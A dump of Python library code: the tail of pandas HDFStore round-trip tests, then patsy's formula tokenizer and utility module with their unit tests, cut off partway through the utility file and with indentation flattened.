def test_store_hierarchical(setup_path, multiindex_dataframe_random_data):
frame = multiindex_dataframe_random_data
_check_roundtrip(frame, tm.assert_frame_equal, path=setup_path)
_check_roundtrip(frame.T, tm.assert_frame_equal, path=setup_path)
_check_roundtrip(frame["A"], tm.assert_series_equal, path=setup_path)
# check that the names are stored
with ensure_clean_store(setup_path) as store:
store["frame"] = frame
recons = store["frame"]
tm.assert_frame_equal(recons, frame)
@pytest.mark.parametrize(
"compression", [False, pytest.param(True, marks=td.skip_if_windows)]
)
def test_store_mixed(compression, setup_path):
def _make_one():
df = tm.makeDataFrame()
df["obj1"] = "foo"
df["obj2"] = "bar"
df["bool1"] = df["A"] > 0
df["bool2"] = df["B"] > 0
df["int1"] = 1
df["int2"] = 2
return df._consolidate()
df1 = _make_one()
df2 = _make_one()
_check_roundtrip(df1, tm.assert_frame_equal, path=setup_path)
_check_roundtrip(df2, tm.assert_frame_equal, path=setup_path)
with ensure_clean_store(setup_path) as store:
store["obj"] = df1
tm.assert_frame_equal(store["obj"], df1)
store["obj"] = df2
tm.assert_frame_equal(store["obj"], df2)
# check that can store Series of all of these types
_check_roundtrip(
df1["obj1"],
tm.assert_series_equal,
path=setup_path,
compression=compression,
)
_check_roundtrip(
df1["bool1"],
tm.assert_series_equal,
path=setup_path,
compression=compression,
)
_check_roundtrip(
df1["int1"],
tm.assert_series_equal,
path=setup_path,
compression=compression,
)
def _check_roundtrip(obj, comparator, path, compression=False, **kwargs):
options = {}
if compression:
options["complib"] = _default_compressor
with ensure_clean_store(path, "w", **options) as store:
store["obj"] = obj
retrieved = store["obj"]
comparator(retrieved, obj, **kwargs)
def _check_double_roundtrip(obj, comparator, path, compression=False, **kwargs):
options = {}
if compression:
options["complib"] = compression or _default_compressor
with ensure_clean_store(path, "w", **options) as store:
store["obj"] = obj
retrieved = store["obj"]
comparator(retrieved, obj, **kwargs)
store["obj"] = retrieved
again = store["obj"]
comparator(again, obj, **kwargs)
def _check_roundtrip_table(obj, comparator, path, compression=False):
options = {}
if compression:
options["complib"] = _default_compressor
with ensure_clean_store(path, "w", **options) as store:
store.put("obj", obj, format="table")
retrieved = store["obj"]
comparator(retrieved, obj)
def test_unicode_index(setup_path):
unicode_values = ["\u03c3", "\u03c3\u03c3"]
# PerformanceWarning
with catch_warnings(record=True):
simplefilter("ignore", pd.errors.PerformanceWarning)
s = Series(np.random.randn(len(unicode_values)), unicode_values)
_check_roundtrip(s, tm.assert_series_equal, path=setup_path)
def test_unicode_longer_encoded(setup_path):
# GH 11234
char = "\u0394"
df = DataFrame({"A": [char]})
with ensure_clean_store(setup_path) as store:
store.put("df", df, format="table", encoding="utf-8")
result = store.get("df")
tm.assert_frame_equal(result, df)
df = DataFrame({"A": ["a", char], "B": ["b", "b"]})
with ensure_clean_store(setup_path) as store:
store.put("df", df, format="table", encoding="utf-8")
result = store.get("df")
tm.assert_frame_equal(result, df)
def test_store_datetime_mixed(setup_path):
df = DataFrame({"a": [1, 2, 3], "b": [1.0, 2.0, 3.0], "c": ["a", "b", "c"]})
ts = tm.makeTimeSeries()
df["d"] = ts.index[:3]
_check_roundtrip(df, tm.assert_frame_equal, path=setup_path)
def test_round_trip_equals(setup_path):
# GH 9330
df = DataFrame({"B": [1, 2], "A": ["x", "y"]})
with ensure_clean_path(setup_path) as path:
df.to_hdf(path, "df", format="table")
other = read_hdf(path, "df")
tm.assert_frame_equal(df, other)
assert df.equals(other)
assert other.equals(df)
```
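A recurring theme in the tests above is the split between the default "fixed" format and the "table" format: only tables support `append=True` and `where` queries. A minimal, self-contained sketch of that behaviour (assumes PyTables is installed; the file name is arbitrary):

```python
import pandas as pd
from pandas import read_hdf

df = pd.DataFrame({"A": range(5), "B": range(5)})
df.to_hdf("roundtrip_example.h5", "fixed_df")  # default "fixed" format: fast, but no append/query
df.iloc[:3].to_hdf("roundtrip_example.h5", "table_df", format="table")
df.iloc[3:].to_hdf("roundtrip_example.h5", "table_df", format="table", append=True)
result = read_hdf("roundtrip_example.h5", "table_df", where=["index>2"])
pd.testing.assert_frame_equal(result, df[df.index > 2])
```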
#### File: site-packages/patsy/tokens.py
```python
import tokenize
from six.moves import cStringIO as StringIO
from patsy import PatsyError
from patsy.origin import Origin
__all__ = ["python_tokenize", "pretty_untokenize",
"normalize_token_spacing"]
# A convenience wrapper around tokenize.generate_tokens; yields tuples of
# (tokenize type, token string, Origin object).
def python_tokenize(code):
# Since formulas can only contain Python expressions, and Python
# expressions cannot meaningfully contain newlines, we'll just remove all
# the newlines up front to avoid any complications:
code = code.replace("\n", " ").strip()
it = tokenize.generate_tokens(StringIO(code).readline)
try:
for (pytype, string, (_, start), (_, end), code) in it:
if pytype == tokenize.ENDMARKER:
break
origin = Origin(code, start, end)
assert pytype != tokenize.NL
if pytype == tokenize.NEWLINE:
assert string == ""
continue
if pytype == tokenize.ERRORTOKEN:
raise PatsyError("error tokenizing input "
"(maybe an unclosed string?)",
origin)
if pytype == tokenize.COMMENT:
raise PatsyError("comments are not allowed", origin)
yield (pytype, string, origin)
else: # pragma: no cover
raise ValueError("stream ended without ENDMARKER?!?")
except tokenize.TokenError as e:
# TokenError is raised iff the tokenizer thinks that there is
# some sort of multi-line construct in progress (e.g., an
# unclosed parentheses, which in Python lets a virtual line
# continue past the end of the physical line), and it hits the
# end of the source text. We have our own error handling for
# such cases, so just treat this as an end-of-stream.
#
# Just in case someone adds some other error case:
assert e.args[0].startswith("EOF in multi-line")
return
def test_python_tokenize():
code = "a + (foo * -1)"
tokens = list(python_tokenize(code))
expected = [(tokenize.NAME, "a", Origin(code, 0, 1)),
(tokenize.OP, "+", Origin(code, 2, 3)),
(tokenize.OP, "(", Origin(code, 4, 5)),
(tokenize.NAME, "foo", Origin(code, 5, 8)),
(tokenize.OP, "*", Origin(code, 9, 10)),
(tokenize.OP, "-", Origin(code, 11, 12)),
(tokenize.NUMBER, "1", Origin(code, 12, 13)),
(tokenize.OP, ")", Origin(code, 13, 14))]
assert tokens == expected
code2 = "a + (b"
tokens2 = list(python_tokenize(code2))
expected2 = [(tokenize.NAME, "a", Origin(code2, 0, 1)),
(tokenize.OP, "+", Origin(code2, 2, 3)),
(tokenize.OP, "(", Origin(code2, 4, 5)),
(tokenize.NAME, "b", Origin(code2, 5, 6))]
assert tokens2 == expected2
import pytest
pytest.raises(PatsyError, list, python_tokenize("a b # c"))
pytest.raises(PatsyError, list, python_tokenize("a b \"c"))
_python_space_both = (list("+-*/%&^|<>")
+ ["==", "<>", "!=", "<=", ">=",
"<<", ">>", "**", "//"])
_python_space_before = (_python_space_both
+ ["!", "~"])
_python_space_after = (_python_space_both
+ [",", ":"])
def pretty_untokenize(typed_tokens):
text = []
prev_was_space_delim = False
prev_wants_space = False
prev_was_open_paren_or_comma = False
prev_was_object_like = False
brackets = []
for token_type, token in typed_tokens:
assert token_type not in (tokenize.INDENT, tokenize.DEDENT,
tokenize.NL)
if token_type == tokenize.NEWLINE:
continue
if token_type == tokenize.ENDMARKER:
continue
if token_type in (tokenize.NAME, tokenize.NUMBER, tokenize.STRING):
if prev_wants_space or prev_was_space_delim:
text.append(" ")
text.append(token)
prev_wants_space = False
prev_was_space_delim = True
else:
if token in ("(", "[", "{"):
brackets.append(token)
elif brackets and token in (")", "]", "}"):
brackets.pop()
this_wants_space_before = (token in _python_space_before)
this_wants_space_after = (token in _python_space_after)
# Special case for slice syntax: foo[:10]
# Otherwise ":" is spaced after, like: "{1: ...}", "if a: ..."
if token == ":" and brackets and brackets[-1] == "[":
this_wants_space_after = False
# Special case for foo(*args), foo(a, *args):
if token in ("*", "**") and prev_was_open_paren_or_comma:
this_wants_space_before = False
this_wants_space_after = False
# Special case for "a = foo(b=1)":
if token == "=" and not brackets:
this_wants_space_before = True
this_wants_space_after = True
# Special case for unary -, +. Our heuristic is that if we see the
# + or - after something that looks like an object (a NAME,
# NUMBER, STRING, or close paren) then it is probably binary,
# otherwise it is probably unary.
if token in ("+", "-") and not prev_was_object_like:
this_wants_space_before = False
this_wants_space_after = False
if prev_wants_space or this_wants_space_before:
text.append(" ")
text.append(token)
prev_wants_space = this_wants_space_after
prev_was_space_delim = False
if (token_type in (tokenize.NAME, tokenize.NUMBER, tokenize.STRING)
or token == ")"):
prev_was_object_like = True
else:
prev_was_object_like = False
prev_was_open_paren_or_comma = token in ("(", ",")
return "".join(text)
def normalize_token_spacing(code):
tokens = [(t[0], t[1])
for t in tokenize.generate_tokens(StringIO(code).readline)]
return pretty_untokenize(tokens)
def test_pretty_untokenize_and_normalize_token_spacing():
assert normalize_token_spacing("1 + 1") == "1 + 1"
assert normalize_token_spacing("1+1") == "1 + 1"
assert normalize_token_spacing("1*(2+3**2)") == "1 * (2 + 3 ** 2)"
assert normalize_token_spacing("a and b") == "a and b"
assert normalize_token_spacing("foo(a=bar.baz[1:])") == "foo(a=bar.baz[1:])"
assert normalize_token_spacing("""{"hi":foo[:]}""") == """{"hi": foo[:]}"""
assert normalize_token_spacing("""'a' "b" 'c'""") == """'a' "b" 'c'"""
assert normalize_token_spacing('"""a""" is 1 or 2==3') == '"""a""" is 1 or 2 == 3'
assert normalize_token_spacing("foo ( * args )") == "foo(*args)"
assert normalize_token_spacing("foo ( a * args )") == "foo(a * args)"
assert normalize_token_spacing("foo ( ** args )") == "foo(**args)"
assert normalize_token_spacing("foo ( a ** args )") == "foo(a ** args)"
assert normalize_token_spacing("foo (1, * args )") == "foo(1, *args)"
assert normalize_token_spacing("foo (1, a * args )") == "foo(1, a * args)"
assert normalize_token_spacing("foo (1, ** args )") == "foo(1, **args)"
assert normalize_token_spacing("foo (1, a ** args )") == "foo(1, a ** args)"
assert normalize_token_spacing("a=foo(b = 1)") == "a = foo(b=1)"
assert normalize_token_spacing("foo(+ 10, bar = - 1)") == "foo(+10, bar=-1)"
assert normalize_token_spacing("1 + +10 + -1 - 5") == "1 + +10 + -1 - 5"
```
#### File: site-packages/patsy/util.py
```python
__all__ = ["atleast_2d_column_default", "uniqueify_list",
"widest_float", "widest_complex", "wide_dtype_for", "widen",
"repr_pretty_delegate", "repr_pretty_impl",
"SortAnythingKey", "safe_scalar_isnan", "safe_isnan",
"iterable",
"have_pandas",
"have_pandas_categorical",
"have_pandas_categorical_dtype",
"pandas_Categorical_from_codes",
"pandas_Categorical_categories",
"pandas_Categorical_codes",
"safe_is_pandas_categorical_dtype",
"safe_is_pandas_categorical",
"safe_issubdtype",
"no_pickling",
"assert_no_pickling",
"safe_string_eq",
]
import sys
import numpy as np
import six
from six.moves import cStringIO as StringIO
from .compat import optional_dep_ok
try:
import pandas
except ImportError:
have_pandas = False
else:
have_pandas = True
# Pandas versions < 0.9.0 don't have Categorical
# Can drop this guard whenever we drop support for such older versions of
# pandas.
have_pandas_categorical = (have_pandas and hasattr(pandas, "Categorical"))
if not have_pandas:
have_pandas_categorical_dtype = False
_pandas_is_categorical_dtype = None
else:
if hasattr(pandas, "api"):
# This is available starting in pandas v0.19.0
have_pandas_categorical_dtype = True
_pandas_is_categorical_dtype = pandas.api.types.is_categorical_dtype
else:
# This is needed for pandas v0.18.0 and earlier
_pandas_is_categorical_dtype = getattr(pandas.core.common,
"is_categorical_dtype", None)
have_pandas_categorical_dtype = (_pandas_is_categorical_dtype
is not None)
# Passes Series and DataFrames through unchanged; calls np.asarray() on everything else.
def asarray_or_pandas(a, copy=False, dtype=None, subok=False):
if have_pandas:
if isinstance(a, (pandas.Series, pandas.DataFrame)):
# The .name attribute on Series is discarded when passing through
# the constructor:
# https://github.com/pydata/pandas/issues/1578
extra_args = {}
if hasattr(a, "name"):
extra_args["name"] = a.name
return a.__class__(a, copy=copy, dtype=dtype, **extra_args)
return np.array(a, copy=copy, dtype=dtype, subok=subok)
def test_asarray_or_pandas():
import warnings
assert type(asarray_or_pandas([1, 2, 3])) is np.ndarray
with warnings.catch_warnings() as w:
warnings.filterwarnings('ignore', 'the matrix subclass',
PendingDeprecationWarning)
assert type(asarray_or_pandas(np.matrix([[1, 2, 3]]))) is np.ndarray
assert type(asarray_or_pandas(
np.matrix([[1, 2, 3]]), subok=True)) is np.matrix
assert w is None
a = np.array([1, 2, 3])
assert asarray_or_pandas(a) is a
a_copy = asarray_or_pandas(a, copy=True)
assert np.array_equal(a, a_copy)
a_copy[0] = 100
assert not np.array_equal(a, a_copy)
assert np.allclose(asarray_or_pandas([1, 2, 3], dtype=float),
[1.0, 2.0, 3.0])
assert asarray_or_pandas([1, 2, 3], dtype=float).dtype == np.dtype(float)
a_view = asarray_or_pandas(a, dtype=a.dtype)
a_view[0] = 99
assert a[0] == 99
global have_pandas
if have_pandas:
s = pandas.Series([1, 2, 3], name="A", index=[10, 20, 30])
s_view1 = asarray_or_pandas(s)
assert s_view1.name == "A"
assert np.array_equal(s_view1.index, [10, 20, 30])
s_view1[10] = 101
assert s[10] == 101
s_copy = asarray_or_pandas(s, copy=True)
assert s_copy.name == "A"
assert np.array_equal(s_copy.index, [10, 20, 30])
assert np.array_equal(s_copy, s)
s_copy[10] = 100
assert not np.array_equal(s_copy, s)
assert asarray_or_pandas(s, dtype=float).dtype == np.dtype(float)
s_view2 = asarray_or_pandas(s, dtype=s.dtype)
assert s_view2.name == "A"
assert np.array_equal(s_view2.index, [10, 20, 30])
s_view2[10] = 99
assert s[10] == 99
df = pandas.DataFrame([[1, 2, 3]],
columns=["A", "B", "C"],
index=[10])
df_view1 = asarray_or_pandas(df)
df_view1.loc[10, "A"] = 101
assert np.array_equal(df_view1.columns, ["A", "B", "C"])
assert np.array_equal(df_view1.index, [10])
assert df.loc[10, "A"] == 101
df_copy = asarray_or_pandas(df, copy=True)
assert np.array_equal(df_copy, df)
assert np.array_equal(df_copy.columns, ["A", "B", "C"])
assert np.array_equal(df_copy.index, [10])
df_copy.loc[10, "A"] = 100
assert not np.array_equal(df_copy, df)
df_converted = asarray_or_pandas(df, dtype=float)
assert df_converted["A"].dtype == np.dtype(float)
assert np.allclose(df_converted, df)
assert np.array_equal(df_converted.columns, ["A", "B", "C"])
assert np.array_equal(df_converted.index, [10])
df_view2 = asarray_or_pandas(df, dtype=df["A"].dtype)
assert np.array_equal(df_view2.columns, ["A", "B", "C"])
assert np.array_equal(df_view2.index, [10])
# This actually makes a copy, not a view, because of a pandas bug:
# https://github.com/pydata/pandas/issues/1572
assert np.array_equal(df, df_view2)
# df_view2[0][0] = 99
# assert df[0][0] == 99
had_pandas = have_pandas
try:
have_pandas = False
assert (type(asarray_or_pandas(pandas.Series([1, 2, 3])))
is np.ndarray)
assert (type(asarray_or_pandas(pandas.DataFrame([[1, 2, 3]])))
is np.ndarray)
finally:
have_pandas = had_pandas
# Like np.atleast_2d, but this converts lower-dimensional arrays into columns,
# instead of rows. It also converts ndarray subclasses into basic ndarrays,
# which makes it easier to guarantee correctness. However, there are many
# places in the code where we want to preserve pandas indexing information if
# present, so there is also an option to preserve it (preserve_pandas=True).
def atleast_2d_column_default(a, preserve_pandas=False):
if preserve_pandas and have_pandas:
if isinstance(a, pandas.Series):
return pandas.DataFrame(a)
elif isinstance(a, pandas.DataFrame):
return a
# fall through
a = np.asarray(a)
a = np.atleast_1d(a)
if a.ndim <= 1:
a = a.reshape((-1, 1))
assert a.ndim >= 2
return a
def test_atleast_2d_column_default():
import warnings
assert np.all(atleast_2d_column_default([1, 2, 3]) == [[1], [2], [3]])
assert atleast_2d_column_default(1).shape == (1, 1)
assert atleast_2d_column_default([1]).shape == (1, 1)
assert atleast_2d_column_default([[1]]).shape == (1, 1)
assert atleast_2d_column_default([[[1]]]).shape == (1, 1, 1)
assert atleast_2d_column_default([1, 2, 3]).shape == (3, 1)
assert atleast_2d_column_default([[1], [2], [3]]).shape == (3, 1)
with warnings.catch_warnings() as w:
warnings.filterwarnings('ignore', 'the matrix subclass',
PendingDeprecationWarning)
assert type(atleast_2d_column_default(np.matrix(1))) == np.ndarray
assert w is None
global have_pandas
if have_pandas:
assert (type(atleast_2d_column_default(pandas.Series([1, 2])))
== np.ndarray)
assert (type(atleast_2d_column_default(pandas.DataFrame([[1], [2]])))
== np.ndarray)
assert (type(atleast_2d_column_default(pandas.Series([1, 2]),
preserve_pandas=True))
== pandas.DataFrame)
assert (type(atleast_2d_column_default(pandas.DataFrame([[1], [2]]),
preserve_pandas=True))
== pandas.DataFrame)
s = pandas.Series([10, 11, 12], name="hi", index=["a", "b", "c"])
df = atleast_2d_column_default(s, preserve_pandas=True)
assert isinstance(df, pandas.DataFrame)
assert np.all(df.columns == ["hi"])
assert np.all(df.index == ["a", "b", "c"])
with warnings.catch_warnings() as w:
warnings.filterwarnings('ignore', 'the matrix subclass',
PendingDeprecationWarning)
assert (type(atleast_2d_column_default(np.matrix(1),
preserve_pandas=True))
== np.ndarray)
assert w is None
assert (type(atleast_2d_column_default([1, 2, 3], preserve_pandas=True))
== np.ndarray)
if have_pandas:
had_pandas = have_pandas
try:
have_pandas = False
assert (type(atleast_2d_column_default(pandas.Series([1, 2]),
preserve_pandas=True))
== np.ndarray)
assert (type(atleast_2d_column_default(pandas.DataFrame([[1], [2]]),
preserve_pandas=True))
== np.ndarray)
finally:
have_pandas = had_pandas
# A version of .reshape() that knows how to down-convert a 1-column
# pandas.DataFrame into a pandas.Series. Useful for code that wants to be
# agnostic between 1d and 2d data, with the pattern:
# new_a = atleast_2d_column_default(a, preserve_pandas=True)
# # do stuff to new_a, which can assume it's always 2 dimensional
# return pandas_friendly_reshape(new_a, a.shape)
def pandas_friendly_reshape(a, new_shape):
if not have_pandas:
return a.reshape(new_shape)
if not isinstance(a, pandas.DataFrame):
return a.reshape(new_shape)
# we have a DataFrame. Only supported reshapes are no-op, and
# single-column DataFrame -> Series.
if new_shape == a.shape:
return a
if len(new_shape) == 1 and a.shape[1] == 1:
if new_shape[0] != a.shape[0]:
raise ValueError("arrays have incompatible sizes")
return a[a.columns[0]]
raise ValueError("cannot reshape a DataFrame with shape %s to shape %s"
% (a.shape, new_shape))
def test_pandas_friendly_reshape():
import pytest
global have_pandas
assert np.allclose(pandas_friendly_reshape(np.arange(10).reshape(5, 2),
(2, 5)),
np.arange(10).reshape(2, 5))
if have_pandas:
df = pandas.DataFrame({"x": [1, 2, 3]}, index=["a", "b", "c"])
noop = pandas_friendly_reshape(df, (3, 1))
assert isinstance(noop, pandas.DataFrame)
assert np.array_equal(noop.index, ["a", "b", "c"])
assert np.array_equal(noop.columns, ["x"])
squozen = pandas_friendly_reshape(df, (3,))
assert isinstance(squozen, pandas.Series)
assert np.array_equal(squozen.index, ["a", "b", "c"])
assert squozen.name == "x"
pytest.raises(ValueError, pandas_friendly_reshape, df, (4,))
pytest.raises(ValueError, pandas_friendly_reshape, df, (1, 3))
pytest.raises(ValueError, pandas_friendly_reshape, df, (3, 3))
had_pandas = have_pandas
try:
have_pandas = False
# this will try to do a reshape directly, and DataFrames *have* no
# reshape method
pytest.raises(AttributeError, pandas_friendly_reshape, df, (3,))
finally:
have_pandas = had_pandas
def uniqueify_list(seq):
seq_new = []
seen = set()
for obj in seq:
if obj not in seen:
seq_new.append(obj)
seen.add(obj)
return seq_new
def test_to_uniqueify_list():
assert uniqueify_list([1, 2, 3]) == [1, 2, 3]
assert uniqueify_list([1, 3, 3, 2, 3, 1]) == [1, 3, 2]
assert uniqueify_list([3, 2, 1, 4, 1, 2, 3]) == [3, 2, 1, 4]
for float_type in ("float128", "float96", "float64"):
if hasattr(np, float_type):
widest_float = getattr(np, float_type)
break
else: # pragma: no cover
assert False
for complex_type in ("complex256", "complex192", "complex128"):
if hasattr(np, complex_type):
widest_complex = getattr(np, complex_type)
break
else: # pragma: no cover
assert False
def wide_dtype_for(arr):
arr = np.asarray(arr)
if (safe_issubdtype(arr.dtype, np.integer)
or safe_issubdtype(arr.dtype, np.floating)):
return widest_float
elif safe_issubdtype(arr.dtype, np.complexfloating):
return widest_complex
raise ValueError("cannot widen a non-numeric type %r" % (arr.dtype,))
def widen(arr):
return np.asarray(arr, dtype=wide_dtype_for(arr))
def test_wide_dtype_for_and_widen():
assert np.allclose(widen([1, 2, 3]), [1, 2, 3])
assert widen([1, 2, 3]).dtype == widest_float
assert np.allclose(widen([1.0, 2.0, 3.0]), [1, 2, 3])
assert widen([1.0, 2.0, 3.0]).dtype == widest_float
assert np.allclose(widen([1+0j, 2, 3]), [1, 2, 3])
assert widen([1+0j, 2, 3]).dtype == widest_complex
import pytest
pytest.raises(ValueError, widen, ["hi"])
class PushbackAdapter(object):
def __init__(self, it):
self._it = it
self._pushed = []
def __iter__(self):
return self
def push_back(self, obj):
self._pushed.append(obj)
def next(self):
if self._pushed:
return self._pushed.pop()
else:
# May raise StopIteration
return six.advance_iterator(self._it)
__next__ = next
def peek(self):
try:
obj = six.advance_iterator(self)
except StopIteration:
raise ValueError("no more data")
self.push_back(obj)
return obj
def has_more(self):
try:
self.peek()
except ValueError:
return False
else:
return True
def test_PushbackAdapter():
it = PushbackAdapter(iter([1, 2, 3, 4]))
assert it.has_more()
assert six.advance_iterator(it) == 1
it.push_back(0)
assert six.advance_iterator(it) == 0
assert six.advance_iterator(it) == 2
assert it.peek() == 3
it.push_back(10)
assert it.peek() == 10
it.push_back(20)
assert it.peek() == 20
assert it.has_more()
assert list(it) == [20, 10, 3, 4]
assert not it.has_more()
# The IPython pretty-printer gives very nice output that is difficult to get
# otherwise, e.g., look how much more readable this is than if it were all
# smooshed onto one line:
#
# ModelDesc(input_code='y ~ x*asdf',
# lhs_terms=[Term([EvalFactor('y')])],
# rhs_terms=[Term([]),
# Term([EvalFactor('x')]),
# Term([EvalFactor('asdf')]),
# Term([EvalFactor('x'), EvalFactor('asdf')])],
# )
#
# But, we don't want to assume it always exists; nor do we want to be
# re-writing every repr function twice, once for regular repr and once for
# the pretty printer. So, here's an ugly fallback implementation that can be
# used unconditionally to implement __repr__ in terms of _pretty_repr_.
#
# Pretty printer docs:
# http://ipython.org/ipython-doc/dev/api/generated/IPython.lib.pretty.html
class _MiniPPrinter(object):
def __init__(self):
self._out = StringIO()
self.indentation = 0
def text(self, text):
self._out.write(text)
def breakable(self, sep=" "):
self._out.write(sep)
def begin_group(self, _, text):
self.text(text)
def end_group(self, _, text):
self.text(text)
def pretty(self, obj):
if hasattr(obj, "_repr_pretty_"):
obj._repr_pretty_(self, False)
else:
self.text(repr(obj))
def getvalue(self):
return self._out.getvalue()
def _mini_pretty(obj):
printer = _MiniPPrinter()
printer.pretty(obj)
return printer.getvalue()
def repr_pretty_delegate(obj):
# If IPython is already loaded, then might as well use it. (Most commonly
# this will occur if we are in an IPython session, but somehow someone has
    # called repr() directly. This can happen for example if printing a
# container like a namedtuple that IPython lacks special code for
# pretty-printing.) But, if IPython is not already imported, we do not
# attempt to import it. This makes patsy itself faster to import (as of
# Nov. 2012 I measured the extra overhead from loading IPython as ~4
# seconds on a cold cache), it prevents IPython from automatically
# spawning a bunch of child processes (!) which may not be what you want
# if you are not otherwise using IPython, and it avoids annoying the
# pandas people who have some hack to tell whether you are using IPython
# in their test suite (see patsy bug #12).
if optional_dep_ok and "IPython" in sys.modules:
from IPython.lib.pretty import pretty
return pretty(obj)
else:
return _mini_pretty(obj)
def repr_pretty_impl(p, obj, args, kwargs=[]):
name = obj.__class__.__name__
p.begin_group(len(name) + 1, "%s(" % (name,))
started = [False]
def new_item():
if started[0]:
p.text(",")
p.breakable()
started[0] = True
for arg in args:
new_item()
p.pretty(arg)
for label, value in kwargs:
new_item()
p.begin_group(len(label) + 1, "%s=" % (label,))
p.pretty(value)
p.end_group(len(label) + 1, "")
p.end_group(len(name) + 1, ")")
def test_repr_pretty():
assert repr_pretty_delegate("asdf") == "'asdf'"
printer = _MiniPPrinter()
class MyClass(object):
pass
repr_pretty_impl(printer, MyClass(),
["a", 1], [("foo", "bar"), ("asdf", "asdf")])
assert printer.getvalue() == "MyClass('a', 1, foo='bar', asdf='asdf')"
# In Python 3, objects of different types are not generally comparable, so a
# list of heterogeneous types cannot be sorted. This implements a Python 2
# style comparison for arbitrary types. (It works on Python 2 too, but just
# gives you the built-in ordering.) To understand why this is tricky, consider
# this example:
# a = 1 # type 'int'
# b = 1.5 # type 'float'
# class gggg:
# pass
# c = gggg()
# sorted([a, b, c])
# The fallback ordering sorts by class name, so according to the fallback
# ordering, we have b < c < a. But, of course, a and b are comparable (even
# though they're of different types), so we also have a < b. This is
# inconsistent. There is no general solution to this problem (which I guess is
# why Python 3 stopped trying), but the worst offender is all the different
# "numeric" classes (int, float, complex, decimal, rational...), so as a
# special-case, we sort all numeric objects to the start of the list.
# (In Python 2, there is also a similar special case for str and unicode, but
# we don't have to worry about that for Python 3.)
class SortAnythingKey(object):
def __init__(self, obj):
self.obj = obj
def _python_lt(self, other_obj):
# On Py2, < never raises an error, so this is just <. (Actually it
# does raise a TypeError for comparing complex to numeric, but not for
# comparisons of complex to other types. Sigh. Whatever.)
# On Py3, this returns a bool if available, and otherwise returns
# NotImplemented
try:
return self.obj < other_obj
except TypeError:
return NotImplemented
def __lt__(self, other):
assert isinstance(other, SortAnythingKey)
result = self._python_lt(other.obj)
if result is not NotImplemented:
return result
# Okay, that didn't work, time to fall back.
# If one of these is a number, then it is smaller.
if self._python_lt(0) is not NotImplemented:
return True
if other._python_lt(0) is not NotImplemented:
return False
# Also check ==, since it may well be defined for otherwise
# unorderable objects, and if so then we should be consistent with
# it:
if self.obj == other.obj:
return False
# Otherwise, we break ties based on class name and memory position
return ((self.obj.__class__.__name__, id(self.obj))
< (other.obj.__class__.__name__, id(other.obj)))
def test_SortAnythingKey():
assert sorted([20, 10, 0, 15], key=SortAnythingKey) == [0, 10, 15, 20]
assert sorted([10, -1.5], key=SortAnythingKey) == [-1.5, 10]
assert sorted([10, "a", 20.5, "b"], key=SortAnythingKey) == [10, 20.5, "a", "b"]
class a(object):
pass
class b(object):
pass
class z(object):
pass
a_obj = a()
b_obj = b()
z_obj = z()
o_obj = object()
assert (sorted([z_obj, a_obj, 1, b_obj, o_obj], key=SortAnythingKey)
== [1, a_obj, b_obj, o_obj, z_obj])
# NaN checking functions that work on arbitrary objects, on old Python
# versions (math.isnan is only in 2.6+), etc.
def safe_scalar_isnan(x):
try:
return np.isnan(float(x))
except (TypeError, ValueError, NotImplementedError):
return False
safe_isnan = np.vectorize(safe_scalar_isnan, otypes=[bool])
def test_safe_scalar_isnan():
assert not safe_scalar_isnan(True)
assert not safe_scalar_isnan(None)
assert not safe_scalar_isnan("sadf")
assert not safe_scalar_isnan((1, 2, 3))
assert not safe_scalar_isnan(np.asarray([1, 2, 3]))
assert not safe_scalar_isnan([np.nan])
assert safe_scalar_isnan(np.nan)
assert safe_scalar_isnan(np.float32(np.nan))
assert safe_scalar_isnan(float(np.nan))
def test_safe_isnan():
assert np.array_equal(safe_isnan([1, True, None, np.nan, "asdf"]),
[False, False, False, True, False])
assert safe_isnan(np.nan).ndim == 0
assert safe_isnan(np.nan)
assert not safe_isnan(None)
# raw isnan raises a *different* error for strings than for objects:
assert not safe_isnan("asdf")
def iterable(obj):
try:
iter(obj)
except Exception:
return False
return True
def test_iterable():
assert iterable("asdf")
assert iterable([])
assert iterable({"a": 1})
assert not iterable(1)
assert not iterable(iterable)
##### Handling Pandas's categorical stuff is horrible and hateful
# Basically they decided that they didn't like how numpy does things, so their
# categorical stuff is *kinda* like how numpy would do it (e.g. they have a
# special ".dtype" attribute to mark categorical data), so by default you'll
# find yourself using the same code paths to handle pandas categorical data
# and other non-categorical data. BUT, all the idioms for detecting
# categorical data blow up with errors if you try them with real numpy dtypes,
# and all numpy's idioms for detecting non-categorical types blow up with
# errors if you try them with pandas categorical stuff. So basically they have
# just poisoned all code that touches dtypes; the old numpy stuff is unsafe,
# and you must use special code like below.
#
# Also there are hoops to jump through to handle both the old style
# (Categorical objects) and new-style (Series with dtype="category").
# Needed to support pandas < 0.15
def pandas_Categorical_from_codes(codes, categories):
assert have_pandas_categorical
# Old versions of pandas sometimes fail to coerce this to an array and
# just return it directly from .labels (?!).
codes = np.asarray(codes)
if hasattr(pandas.Categorical, "from_codes"):
return pandas.Categorical.from_codes(codes, categories)
else:
return pandas.Categorical(codes, categories)
def test_pandas_Categorical_from_codes():
if not have_pandas_categorical:
return
c = pandas_Categorical_from_codes([1, 1, 0, -1], ["a", "b"])
assert np.all(np.asarray(c)[:-1] == ["b", "b", "a"])
assert np.isnan(np.asarray(c)[-1])
# Needed to support pandas < 0.15
def pandas_Categorical_categories(cat):
# In 0.15+, a categorical Series has a .cat attribute which is similar to
# a Categorical object, and Categorical objects are what have .categories
# and .codes attributes.
if hasattr(cat, "cat"):
cat = cat.cat
if hasattr(cat, "categories"):
return cat.categories
else:
return cat.levels
# Needed to support pandas < 0.15
def pandas_Categorical_codes(cat):
# In 0.15+, a categorical Series has a .cat attribute which is a
# Categorical object, and Categorical objects are what have .categories /
# .codes attributes.
if hasattr(cat, "cat"):
cat = cat.cat
if hasattr(cat, "codes"):
return cat.codes
else:
return cat.labels
def test_pandas_Categorical_accessors():
if not have_pandas_categorical:
return
c = pandas_Categorical_from_codes([1, 1, 0, -1], ["a", "b"])
assert np.all(pandas_Categorical_categories(c) == ["a", "b"])
assert np.all(pandas_Categorical_codes(c) == [1, 1, 0, -1])
if have_pandas_categorical_dtype:
s = pandas.Series(c)
assert np.all(pandas_Categorical_categories(s) == ["a", "b"])
assert np.all(pandas_Categorical_codes(s) == [1, 1, 0, -1])
# Needed to support pandas >= 0.15 (!)
def safe_is_pandas_categorical_dtype(dt):
if not have_pandas_categorical_dtype:
return False
return _pandas_is_categorical_dtype(dt)
# Needed to support pandas >= 0.15 (!)
def safe_is_pandas_categorical(data):
if not have_pandas_categorical:
return False
if isinstance(data, pandas.Categorical):
return True
if hasattr(data, "dtype"):
